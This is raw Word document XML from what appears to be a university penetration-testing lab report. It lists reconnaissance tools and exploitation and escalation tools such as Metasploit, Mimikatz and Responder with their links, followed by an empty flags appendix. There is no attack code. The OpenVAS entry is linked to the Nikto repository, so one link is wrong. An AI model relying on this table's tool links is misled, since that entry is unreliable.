      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="100839C7" w14:textId="77777777" w:rsidTr="00AE6477">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2335" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5648882A" w14:textId="77777777" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="379CA8E5" w14:textId="77777777" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="26A0AD02"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269D3FF1" w14:textId="4B59162F" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>FFUF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79AAC050" w14:textId="2E9489D3" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId20" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/ffuf/ffuf</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="6B16E5DB"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7D19E796" w14:textId="7A26525B" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Go</w:t>
            </w:r>
            <w:r w:rsidR="008C4B44" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>uster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65D658BB" w14:textId="05CE6C71" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId21" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/OJ/gobuster</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5274C854"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687D0049" w14:textId="52DEF109" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Nikto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E80E8EF" w14:textId="77777777" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00D70417" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="02BBC65D"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65361E7F" w14:textId="515DF39D" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Nmap Scripting Engine (NSE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="683CE220" w14:textId="07F01D14" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId22" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://nmap.org/book/nse.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="23EEDA95"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78B57E00" w14:textId="171EAED6" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>OpenVAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65AFCA40" w14:textId="03C2FBE6" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId23" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/sullo/nikto</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AC2FA2B" w14:textId="0504293A" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00A34711" w:rsidP="00A34711">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAE553D" w14:textId="6B57286B" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc129370256"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation and </w:t>
      </w:r>
      <w:r w:rsidR="001911E4" w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2335"/>
        <w:gridCol w:w="7015"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="1B232A90" w14:textId="77777777" w:rsidTr="00AE6477">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2335" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3720C5D6" w14:textId="77777777" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F5280C6" w14:textId="77777777" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="67A7E7C9"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2F2488E4" w14:textId="2CD115ED" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CrackMapExec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A45D9C" w14:textId="68EF1B18" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId24" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.kali.org/tools/crackmapexec/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="63E0BA22"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2F73FA1D" w14:textId="4F1879B7" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F4EFA30" w14:textId="17EEAEBD" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId25" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.metasploit.com/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="212716E4"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3F519B1E" w14:textId="0E7181BC" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Mimikatz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38B8B5E6" w14:textId="0345D64A" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId26" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/ParrotSec/mimikatz</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="2D714BD1"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73A5F69A" w14:textId="4363CDCB" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>PowerSploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40F2609D" w14:textId="322E98B7" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId27" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/PowerShellMafia/PowerSploit</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="0E383DA8"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6E76502A" w14:textId="67B66618" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BEE40C9" w14:textId="660E70A2" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="009A100A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId28" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/SpiderLabs/Responder</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F51E7DC" w14:textId="77777777" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00A34711" w:rsidP="00A34711">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5882A859" w14:textId="229847BB" w:rsidR="00B51483" w:rsidRDefault="00B51483">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1740D4D0" w14:textId="4D2E7D60" w:rsidR="00B51483" w:rsidRDefault="00B51483" w:rsidP="00B51483">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490DD67D" w14:textId="5528F4D5" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3"/>
    <w:p w14:paraId="299B6D5B" w14:textId="77777777" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="0061682E" w:rsidP="0061682E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidSect="003035B6">
      <w:headerReference w:type="default" r:id="rId29"/>
      <w:footerReference w:type="default" r:id="rId30"/>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52E1D" w14:textId="77777777" w:rsidR="003035B6" w:rsidRDefault="003035B6" w:rsidP="003719FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="47E40109" w14:textId="77777777" w:rsidR="003035B6" w:rsidRDefault="003035B6" w:rsidP="0037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710138"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="7DB0BE8A" w14:textId="089F4E6E" w:rsidR="003719FB" w:rsidRDefault="003719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14A178" w14:textId="4746AEE7" w:rsidR="003719FB" w:rsidRDefault="003719FB" w:rsidP="00371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BC911" w14:textId="77777777" w:rsidR="003035B6" w:rsidRDefault="003035B6" w:rsidP="003719FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7C96CB9E" w14:textId="77777777" w:rsidR="003035B6" w:rsidRDefault="003035B6" w:rsidP="00371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94884" w14:textId="5DFD2C59" w:rsidR="003719FB" w:rsidRDefault="00D21F47">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="717A7A3C" wp14:editId="2EC52CCD">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>4200525</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>61594</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="2451100" cy="323763"/>
          <wp:effectExtent l="19050" t="19050" r="6350" b="19685"/>
          <wp:wrapNone/>
          <wp:docPr id="1432102753" name="Picture 2" descr="Identity Style Guide | NYU Tandon School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ntity Style Guide | NYU Tandon School of Engineering"/>
                  <pic:cNvPicPr>
                    <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </pic:cNvPicPr>
                </pic:nvPicPr>
                <pic:blipFill rotWithShape="1">
                  <a:blip r:embed="rId1">
                    <a:extLst>
                      <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                        <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                      </a:ext>
                    </a:extLst>
                  </a:blip>
                  <a:srcRect l="-130" t="2780" r="-2129" b="2659"/>
                  <a:stretch/>
                </pic:blipFill>
                <pic:spPr bwMode="auto">
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="2457994" cy="324674"/>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071"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="038EDDA2"/>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29D7C9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FCDAEABE"/>
    <w:lvl w:ilvl="0" w:tplc="3222CDB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BAD613CC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E954BE1C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DE7E439C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0D0C041E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
